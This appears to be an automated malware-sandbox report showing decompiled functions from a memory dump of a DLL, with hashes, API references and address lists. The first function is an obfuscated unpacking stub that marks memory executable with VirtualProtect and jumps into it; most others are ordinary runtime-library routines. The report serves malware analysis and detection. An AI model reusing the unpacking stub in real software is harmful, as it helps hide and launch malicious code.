Opcode ID: 808337c68e454dd762c8a010d37580d7b328b85ac5a11acac2aab8323fdf0fc0
Instruction ID: 5830b275e5be0f6f6f6c38efdfd728fc0ad17f139a1efe92d1193c0f7581701e
Opcode Fuzzy Hash: 808337c68e454dd762c8a010d37580d7b328b85ac5a11acac2aab8323fdf0fc0
Instruction Fuzzy Hash: D0F0FE35C0420C77CF05FBE4EC45CEDB77DAA14104F524560BB2596451EB71A61A87E2

Uniqueness

Uniqueness Score: -1.00%

Function 6DDCF218, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 216
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6DDCF218(signed int __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				signed char _v24;
				signed int _t34;
				signed short _t36;
				void* _t44;
				intOrPtr _t45;
				signed int _t51;
				signed short _t59;
				signed char _t69;
				signed int _t72;
				signed char _t80;
				signed char _t83;
				signed short _t87;
				signed int _t96;
				void* _t98;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t108;
				void* _t109;
				signed char _t110;
				signed int _t112;
				signed int _t120;
				signed int _t126;
				signed int _t127;
				signed char _t131;
				signed int _t132;
				signed char _t133;
				signed int _t135;
				void* _t136;
				signed short* _t137;
				signed short* _t140;
				signed short _t142;
				void* _t147;
				void* _t150;
				void* _t152;
				void* _t153;

				_t34 =  *0x6de959e6 & 0x0000ffff;
				_v12 = __edx;
				asm("cdq");
				_t102 = __edx;
				_v20 = 0xf;
				_t126 =  *0x6de959d8; // 0x69aaf581
				_t140 = 0x6de959e6;
				_t135 =  *0x6de95a00; // 0x0
				_v24 = _t34;
				_v16 = __edx;
				do {
					if(_t126 != _t34) {
						L3:
						_t5 = _t126 + 5; // 0x69aaf586
						_t135 = _t135 * ( *_t140 & 0x0000ffff);
						_t36 =  *0x6de959f0; // 0x421c0090
						_t104 = _t5 + _t135;
						 *0x6de95a90 = _t104;
						if(_t104 != (_t36 & 0x0000ffff)) {
							_t34 = _v24;
							_t102 = _v16;
							goto L5;
						}
					} else {
						_t147 =  *0x6de959dc - _t102; // 0x0
						if(_t147 == 0) {
							goto L5;
						} else {
							goto L3;
						}
					}
					break;
					L5:
					_t140 =  &(_t140[1]);
				} while (_t140 < 0x6de95a44);
				_t141 = _v12 * 0x10e1d;
				 *0x6de95a00 = _t135;
				_t136 =  *0x6deac8d0;
				 *0x6de95a04 = _t126 -  *0x6de95a04 + 0x11;
				 *0x6de98698 = _t136;
				 *0x6de959d8 = E6DDF01E0(_v12 * 0x10e1d, 0, _t126,  *0x6de959dc);
				 *0x6de959dc = _t126;
				VirtualProtect(_t136, 0x305a, 0x40, 0x6de9869c);
				_t127 =  *0x6de959d0; // 0x96574ad2
				_t44 = 6;
				_v24 = _t127;
				_t150 =  *0x6de95a02 - _t44; // 0x0
				if(_t150 == 0) {
					_t45 =  *0x6de95a90; // 0x17f0f31b
					 *0x6de95a00 = _t45 + 0x11dde + _t127;
				} else {
					 *0x6de95a90 =  *0x6de95a90 +  ~_t127 -  *0x6de95a00 * 0x3d;
				}
				_t105 =  *0x6de959d8; // 0x69aaf581
				_t128 =  *0x6de959e6 & 0x0000ffff;
				_v5 = _t127 + _t105;
				if(( *0x6de959f2 & 0x0000ffff) + ( *0x6de959e6 & 0x0000ffff) != 0x32) {
					_t51 = E6DDF01E0(_t141, 0, _t105,  *0x6de959dc);
					_v16 = _t51;
					_v20 = _t51 * 0x00000037 & 0x0000ffff;
				} else {
					_t96 =  *0x6de959dc; // 0x0
					_t98 = E6DDF01E0(E6DDF01E0(_t105, _t96, _t105, _t96), _t128, 0xfffef1e3, 0xffffffff);
					_push(0);
					_v16 = _t98 + _v12 + 0xf;
				}
				_t137 = 0x6de959e6;
				_t108 = _v16;
				_t131 = 0x70 * (_v24 & 0x000000ff) + 0x70;
				_v24 = _t131;
				 *0x6de95a04 = _t131;
				_t152 =  *0x6de95a04 - 0x1b47; // 0xac
				if(_t152 != 0) {
					_t59 = _v20;
				} else {
					asm("cdq");
					_t131 = _v24;
					_t120 = _t108 + ( *0x6de959e6 & 0x0000ffff);
					_v16 = _t120;
					_t59 = _v20 + _t120 * 2 + 0x3b;
				}
				_t109 = 6;
				_t153 =  *0x6de95a02 - _t109; // 0x0
				if(_t153 == 0) {
					 *0x6de95a00 = (_t59 & 0x0000ffff) + 0x11dde + (_t131 & 0x000000ff);
				}
				_t110 =  *0x6de959d0; // 0x96574ad2
				 *0x6de959dc =  *0x6de959dc & 0x00000000;
				_t142 = _v16 + 0x00000005 + _t110 & 0x0000ffff;
				 *0x6de959d8 = _t142 - _v12 - 0x54;
				 *0x6de959d0 = _t110 + 0x23bbc + (_t131 & 0x000000ff) * 2;
				 *0x6de98698();
				_t69 =  *0x6de959d0; // 0x96574ad2
				_t112 =  *0x6de95a04 & 0x000000ff;
				_t132 = _v12;
				 *0x6de959d8 =  *0x6de959d8 + _t69 + 0x3b + _t112;
				_t72 =  *0x6de959e6 & 0x0000ffff;
				asm("adc dword [0x6de959dc], 0x0");
				do {
					if(_t132 == _t72) {
						goto L22;
					} else {
						_t142 = ( *_t137 & 0x0000ffff) * (_t142 & 0x0000ffff) & 0x0000ffff;
						_t112 = _t132 + 5 + _t142;
						 *0x6de959dc = 0;
						_t87 =  *0x6de959f0; // 0x421c0090
						asm("cdq");
						 *0x6de959d8 = _t112;
						if(_t112 != (_t87 & 0x0000ffff) || 0 != _t132) {
							_t72 =  *0x6de959e6 & 0x0000ffff;
							_t132 = _v12;
							goto L22;
						}
					}
					break;
					L22:
					_t137 =  &(_t137[1]);
				} while (_t137 < 0x6de95a44);
				asm("sbb [ecx+0xd8b04b6], eax");
				asm("fcomp dword [ecx-0x17]");
				asm("insd");
				_t133 =  *0x6de959d0; // 0x96574ad2
				_push(0);
				asm("adc [0x6de959dc], eax");
				 *0x6de959d8 = _t112 + (_t142 - _t112 * 0x0000003d - _v12 & 0x0000ffff) + 0x3b + _t133;
				_t80 = ((_t133 & 0x000000ff) * ( *0x6de95a04 & 0x000000ff) & 0x000000ff) * 0x1d;
				 *0x6de95a04 = _t80;
				_t83 = (_t80 & 0x000000ff) * 0x36 + _t133;
				 *0x6de959d0 = _t83;
				return _t83;
			}

0x6ddcf21e
0x6ddcf225
0x6ddcf228
0x6ddcf22a
0x6ddcf22c
0x6ddcf233
0x6ddcf239
0x6ddcf23f
0x6ddcf245
0x6ddcf248
0x6ddcf24b
0x6ddcf24d
0x6ddcf257
0x6ddcf25a
0x6ddcf25d
0x6ddcf260
0x6ddcf268
0x6ddcf26a
0x6ddcf272
0x6ddcf274
0x6ddcf277
0x00000000
0x6ddcf277
0x6ddcf24f
0x6ddcf24f
0x6ddcf255
0x00000000
0x00000000
0x00000000
0x00000000
0x6ddcf255
0x00000000
0x6ddcf27a
0x6ddcf27a
0x6ddcf27d
0x6ddcf28b
0x6ddcf29c
0x6ddcf2a2
0x6ddcf2a8
0x6ddcf2b2
0x6ddcf2ca
0x6ddcf2cf
0x6ddcf2d5
0x6ddcf2db
0x6ddcf2e3
0x6ddcf2e4
0x6ddcf2e7
0x6ddcf2ee
0x6ddcf305
0x6ddcf311
0x6ddcf2f0
0x6ddcf2fd
0x6ddcf2fd
0x6ddcf316
0x6ddcf31f
0x6ddcf326
0x6ddcf335
0x6ddcf36b
0x6ddcf370
0x6ddcf379
0x6ddcf337
0x6ddcf337
0x6ddcf34e
0x6ddcf356
0x6ddcf35c
0x6ddcf35c
0x6ddcf385
0x6ddcf395
0x6ddcf3a0
0x6ddcf3a2
0x6ddcf3a5
0x6ddcf3ab
0x6ddcf3b2
0x6ddcf3cf
0x6ddcf3b4
0x6ddcf3bb
0x6ddcf3bc
0x6ddcf3bf
0x6ddcf3c4
0x6ddcf3ca
0x6ddcf3ca
0x6ddcf3d4
0x6ddcf3d5
0x6ddcf3dc
0x6ddcf3eb
0x6ddcf3eb
0x6ddcf3f3
0x6ddcf3fc
0x6ddcf405
0x6ddcf416
0x6ddcf421
0x6ddcf426
0x6ddcf42c
0x6ddcf431
0x6ddcf43b
0x6ddcf440
0x6ddcf446
0x6ddcf44d
0x6ddcf454
0x6ddcf456
0x00000000
0x6ddcf458
0x6ddcf461
0x6ddcf469
0x6ddcf46d
0x6ddcf472
0x6ddcf47a
0x6ddcf47b
0x6ddcf483
0x6ddcf48b
0x6ddcf492
0x00000000
0x6ddcf492
0x6ddcf483
0x00000000
0x6ddcf495
0x6ddcf495
0x6ddcf498
0x6ddcf4a0
0x6ddcf4a6
0x6ddcf4a9
0x6ddcf4aa
0x6ddcf4b3
0x6ddcf4c5
0x6ddcf4d2
0x6ddcf4e3
0x6ddcf4e6
0x6ddcf4f1
0x6ddcf4f3
0x6ddcf4f9

APIs

VirtualProtect.KERNEL32(?,0000305A,00000040,6DE9869C,?,00000000,69AAF581,008B421C,?), ref: 6DDCF2D5

Strings

Ym, xrefs: 6DDCF239
DZm, xrefs: 6DDCF498
DZm, xrefs: 6DDCF27D
Ym, xrefs: 6DDCF385

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual
String ID: DZm$DZm$Ym$Ym
API String ID: 544645111-1304207040
Opcode ID: 66b78dd07087eebb698fe72109d252a7249524de03542f4504088d7468c9c48b
Instruction ID: 1b7783ae907c16e810d5b0b03dee3187065b4f68668622b1d7abdac7a2d2ec32
Opcode Fuzzy Hash: 66b78dd07087eebb698fe72109d252a7249524de03542f4504088d7468c9c48b
Instruction Fuzzy Hash: 5481AAB2A032619FDB05DF79C8817B9BBF8BB46316B20812BF455DF281E3789540CB21

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD53EB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6DDD53EB(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t35;
				short _t49;
				void* _t54;
				intOrPtr _t56;
				signed int _t59;
				intOrPtr _t67;
				void* _t71;
				void* _t78;

				_t62 = __edx;
				E6DDF014E(0x6de38264, __ebx, __edi, __esi, 0xa4);
				_t56 = __ecx;
				 *((intOrPtr*)(_t71 - 0x4c)) = __ecx;
				 *((intOrPtr*)(_t71 - 0x44)) = E6DE11A3F(__ecx, __edx);
				_t35 = E6DDD91D8(__ecx, __edx, _t78, _t71 - 0x80);
				_t59 = 0xb;
				memcpy(_t71 - 0x40, _t35, _t59 << 2);
				_t67 =  *((intOrPtr*)(_t71 - 0x44));
				_t79 =  *((char*)(_t71 + 0xc));
				 *((intOrPtr*)(_t56 + 8)) = 0;
				 *((intOrPtr*)(_t56 + 0x10)) = 0;
				 *((intOrPtr*)(_t56 + 0x14)) = 0;
				 *((intOrPtr*)(_t71 - 4)) = 0;
				if( *((char*)(_t71 + 0xc)) == 0) {
					_t13 = _t67 + 8; // 0x0
					 *((intOrPtr*)(_t71 - 0x48)) =  *_t13;
				} else {
					 *((intOrPtr*)(_t71 - 0x48)) = 0x6de494dd;
				}
				E6DDD91D8(_t56, _t62, _t79, _t71 - 0x80);
				_push(_t71 - 0xac);
				_push(0);
				 *((intOrPtr*)(_t56 + 8)) = E6DDD5B01(_t62, _t67, 0, _t71, _t79,  *((intOrPtr*)(_t71 - 0x48)));
				_push(_t71 - 0x40);
				 *((intOrPtr*)(_t56 + 0x10)) = E6DDB17AF(_t56, _t62, _t67, 0, _t71, _t79, "false", 0);
				_push(_t71 - 0x40);
				 *((intOrPtr*)(_t56 + 0x14)) = E6DDB17AF(_t56, _t62, _t67, 0, _t71, _t79, "true", 0);
				if( *((char*)(_t71 + 0xc)) == 0) {
					_t28 = _t67 + 0x30; // 0x0
					 *((short*)(_t56 + 0xc)) =  *((intOrPtr*)( *_t28));
					_t30 = _t67 + 0x34; // 0xc
					_t49 =  *((intOrPtr*)( *_t30));
					 *((short*)(_t56 + 0xe)) = _t49;
					return E6DDF009B(_t49, _t56, _t67, 0);
				} else {
					 *((short*)(_t56 + 0xc)) = E6DDB177E(0x2e, 0, _t71 - 0x40);
					_t54 = E6DDB177E(0x2c, 0, _t71 - 0x40);
					asm("into");
					return _t54;
				}
			}

0x6ddd53eb
0x6ddd53f5
0x6ddd53fa
0x6ddd53fc
0x6ddd5404
0x6ddd540b
0x6ddd5413
0x6ddd5419
0x6ddd541b
0x6ddd5420
0x6ddd5424
0x6ddd5427
0x6ddd542a
0x6ddd542d
0x6ddd5430
0x6ddd543b
0x6ddd543e
0x6ddd5432
0x6ddd5432
0x6ddd5432
0x6ddd5445
0x6ddd5451
0x6ddd5452
0x6ddd545e
0x6ddd5464
0x6ddd5473
0x6ddd5479
0x6ddd5488
0x6ddd548f
0x6ddd54bf
0x6ddd54c5
0x6ddd54c9
0x6ddd54cc
0x6ddd54b3
0x6ddd54bc
0x6ddd5491
0x6ddd54a0
0x6ddd54ab
0x6ddd54ac
0x6ddd54ad
0x6ddd54ad

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6DDD53F5
__Getcvt.LIBCPMT ref: 6DDD540B
__Getcvt.LIBCPMT ref: 6DDD5445

Strings

true, xrefs: 6DDD547B
false, xrefs: 6DDD5466

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: Getcvt$H_prolog3_catch_
String ID: false$true
API String ID: 1810345438-2658103896
Opcode ID: 536b3019053b5f5adcaab39d73661af2c2c22c1cb4e5d5bfce782a8dc53b810b
Instruction ID: 6f7cbad37c8a53a6a0cf1397e2e5522250a6e5f7412f30422e2833d0ba6b33b5
Opcode Fuzzy Hash: 536b3019053b5f5adcaab39d73661af2c2c22c1cb4e5d5bfce782a8dc53b810b
Instruction Fuzzy Hash: 262162B5D05218EBDF01EFA0D884AEE7B78FF05314F15416AF9059F201EB709955CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1970F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6DE196A5,?,?,6DE19645,?,6DE92D28,0000000C,6DE1978A), ref: 6DE1972F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6DE19742
FreeLibrary.KERNEL32(00000000,?,?,?,6DE196A5,?,?,6DE19645,?,6DE92D28,0000000C,6DE1978A), ref: 6DE19765

Strings

mscoree.dll, xrefs: 6DE19728
CorExitProcess, xrefs: 6DE1973A

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9b5ae4f79b1306c304e3dd0250e172413c44d195a8156c8908c4d07981042781
Instruction ID: 959a63613e06fc622d8bc7210047ab330ff9f2cb97203f539522cedd1f8a7f7f
Opcode Fuzzy Hash: 9b5ae4f79b1306c304e3dd0250e172413c44d195a8156c8908c4d07981042781
Instruction Fuzzy Hash: 99F08C70A45108ABEF11AF90CC48FBEBFB8EF05206F124169E905A2240CF308A80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE24E2A, Relevance: 7.7, APIs: 5, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E6DE24E2A(void* __ebx, int __edx, void* __edi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				int _v44;
				char _v48;
				void* __esi;
				signed int _t59;
				char* _t61;
				int _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				int _t106;
				int _t107;
				short* _t109;
				int _t110;
				int _t111;
				signed int _t112;

				_t106 = __edx;
				_t59 =  *0x6de9506c; // 0xc4837075
				_v8 = _t59 ^ _t112;
				_t61 = _a4;
				_t91 = _a12;
				_t111 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t109 = _a8;
				_v24 = _t109;
				if(_t61 == 0 || _t91 != 0) {
					if(_t109 != 0) {
						E6DE01F60(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t109, 0xffffffff, _t111, _t111, _t111,  &_v20);
								if(_t64 == 0 || _v20 != _t111) {
									L55:
									_t65 = E6DE12281();
									_t110 = _t109 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t110 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t109 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t110 = _t111;
								goto L56;
							}
							_t106 = 0xff;
							while(_t68 <= _t106) {
								_t109 =  &(_t109[1]);
								_t111 = _t111 + 1;
								_t68 =  *_t109 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t106 = _v44;
						if( *((intOrPtr*)(_t106 + 0xa8)) != _t111) {
							if( *((intOrPtr*)(_t106 + 4)) != 1) {
								_t110 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, 0xffffffff, _t98, _t91, _t111,  &_v20);
								if(_t110 == 0) {
									if(_v20 != _t111 || GetLastError() != 0x7a) {
										L45:
										_t71 = E6DE12281();
										_t111 = _t111 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t107 = _v44;
											_t103 =  *(_t107 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t107 + 8), _t111, _t73, 1,  &_v16, _t103, _t111,  &_v20);
											_t93 = _a12;
											_t106 = _t74;
											if(_t106 == 0 || _v20 != _t111 || _t106 < 0 || _t106 > 5) {
												goto L55;
											}
											if(_t106 + _t110 > _t93) {
												goto L56;
											}
											_t76 = _t111;
											_v32 = _t76;
											if(_t106 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t110 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
												 *((char*)(_t105 + _t110)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t110 = _t110 + 1;
												_v32 = _t76;
												if(_t76 < _t106) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t111) {
									goto L45;
								}
								_t28 = _t110 - 1; // -1
								_t111 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t111 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, _t91, _t98, _t91, _t111,  &_v20);
								if(_t111 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t111 - 1] == 0) {
										_t111 = _t111 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t109;
							_v24 = _t91;
							while( *_t83 != _t111) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t111 &&  *_t83 == _t111) {
								_t91 = (_t83 - _t109 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						_t106 = 0xff;
						while( *_t109 <= _t106) {
							_t98[_t111] =  *_t109;
							_t85 =  *_t109;
							_t109 =  &(_t109[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t111 = _t111 + 1;
							if(_t111 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E6DE12281())) = 0x16;
					E6DE1215B();
					goto L59;
				} else {
					L59:
					return E6DDEF8A5(_v8 ^ _t112, _t106, _t111);
				}
			}

0x6de24e2a
0x6de24e32
0x6de24e39
0x6de24e3c
0x6de24e40
0x6de24e44
0x6de24e46
0x6de24e49
0x6de24e4d
0x6de24e50
0x6de24e55
0x6de24e64
0x6de24e84
0x6de24e89
0x6de24e8e
0x6de2502b
0x6de25034
0x6de25066
0x6de2506e
0x6de2507a
0x6de2507a
0x6de2507f
0x6de25082
0x00000000
0x6de25075
0x6de25075
0x6de25075
0x6de25088
0x6de2508c
0x6de25091
0x6de25091
0x00000000
0x6de25098
0x6de2506e
0x6de25036
0x6de2503c
0x6de25054
0x6de25054
0x00000000
0x6de25054
0x6de2503e
0x6de25043
0x6de25048
0x6de2504b
0x6de2504c
0x6de25052
0x00000000
0x00000000
0x00000000
0x6de25052
0x00000000
0x6de25043
0x6de24e94
0x6de24e9d
0x6de24ed7
0x6de24f50
0x6de24f54
0x6de24f6a
0x6de2501b
0x6de2501b
0x6de25020
0x6de25023
0x00000000
0x6de24f7f
0x6de24f81
0x00000000
0x00000000
0x6de24f87
0x6de24f8a
0x6de24f8a
0x6de24f8d
0x6de24f93
0x6de24f97
0x6de24f97
0x6de24fa9
0x6de24faf
0x6de24fb2
0x6de24fb6
0x00000000
0x00000000
0x6de24fdb
0x00000000
0x00000000
0x6de24fe1
0x6de24fe3
0x6de24fe8
0x6de25008
0x6de2500b
0x6de2500e
0x6de25013
0x00000000
0x00000000
0x00000000
0x6de25019
0x6de24fea
0x6de24fed
0x6de24fed
0x6de24ff1
0x6de24ff6
0x00000000
0x00000000
0x6de24fff
0x6de25000
0x6de25001
0x6de25006
0x00000000
0x00000000
0x00000000
0x6de25006
0x00000000
0x6de24fed
0x00000000
0x6de24f8a
0x6de24f6a
0x6de24f59
0x00000000
0x00000000
0x6de24f5f
0x6de24f5f
0x00000000
0x6de24f5f
0x6de24edb
0x6de24f01
0x6de24f14
0x6de24f18
0x00000000
0x6de24f28
0x6de24f30
0x6de24f36
0x6de24f36
0x00000000
0x6de24f30
0x6de24f18
0x6de24edd
0x6de24edf
0x6de24ee2
0x6de24ee7
0x6de24eea
0x6de24eea
0x6de24eee
0x00000000
0x00000000
0x00000000
0x6de24eee
0x6de24ef3
0x6de24f00
0x6de24f00
0x00000000
0x6de24ef3
0x6de24ea1
0x00000000
0x00000000
0x6de24ea7
0x6de24eac
0x6de24eb7
0x6de24eba
0x6de24ebd
0x6de24ec3
0x00000000
0x00000000
0x6de24ec9
0x6de24ecc
0x00000000
0x00000000
0x00000000
0x6de24ece
0x00000000
0x6de24eac
0x6de24e6b
0x6de24e71
0x00000000
0x6de24e5b
0x6de2509a
0x6de250aa
0x6de250aa

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fbbf136d7f30c389d9af5a20052a603cbfcdbacc2f7bc2534cc154bfbfb86e8
Instruction ID: 14e5a91f94c5b246a43f3be70853349de686870a8f94da74297465997212d272
Opcode Fuzzy Hash: 0fbbf136d7f30c389d9af5a20052a603cbfcdbacc2f7bc2534cc154bfbfb86e8
Instruction Fuzzy Hash: A57170319042179BDB118B59CD84EBEBB75FF56324F34422AE9207B288DF718945CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1A737, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DE1A737(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x6de9506c; // 0xc4837075
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E6DE11F1D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E6DDEF8FA(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E6DDEF8FA(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E6DDEF8FA(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E6DE2AC0E(_t56);
						_t40 = E6DE1CBD3(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E6DE2AC0E(_t56);
						E6DE1CBD3(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x6de9506c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x6de1a737
0x6de1a741
0x6de1a745
0x6de1a747
0x6de1a74b
0x6de1a755
0x6de1a766
0x6de1a76b
0x6de1a76d
0x6de1a76f
0x6de1a771
0x6de1a773
0x6de1a777
0x6de1a831
0x6de1a83f
0x6de1a841
0x6de1a846
0x6de1a84d
0x6de1a84f
0x6de1a85d
0x6de1a86c
0x6de1a86f
0x6de1a871
0x00000000
0x6de1a872
0x6de1a77f
0x6de1a784
0x6de1a789
0x6de1a78b
0x6de1a78b
0x6de1a78d
0x6de1a792
0x6de1a796
0x6de1a796
0x6de1a799
0x6de1a7b8
0x6de1a7b8
0x6de1a7ba
0x6de1a7bd
0x6de1a7c6
0x6de1a7c9
0x6de1a7ce
0x6de1a7d1
0x6de1a7d6
0x00000000
0x00000000
0x6de1a7d8
0x00000000
0x6de1a79b
0x6de1a79b
0x6de1a79d
0x6de1a7a6
0x6de1a7a9
0x6de1a7ae
0x6de1a7b1
0x6de1a7b6
0x6de1a7e0
0x6de1a7e3
0x6de1a7e5
0x6de1a7e8
0x6de1a7f0
0x6de1a7f6
0x6de1a7fd
0x6de1a7ff
0x6de1a807
0x6de1a816
0x6de1a81a
0x6de1a81c
0x6de1a81f
0x00000000
0x00000000
0x6de1a821
0x6de1a824
0x6de1a826
0x6de1a826
0x6de1a827
0x6de1a829
0x6de1a82c
0x00000000
0x6de1a826
0x00000000
0x6de1a7b6
0x6de1a799
0x00000000

APIs

_free.LIBCMT ref: 6DE1A7A9
_free.LIBCMT ref: 6DE1A7C9

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: a074a44c66b17afc6c4d33033072391ebc092e8c24070dc7851116978218d5c3
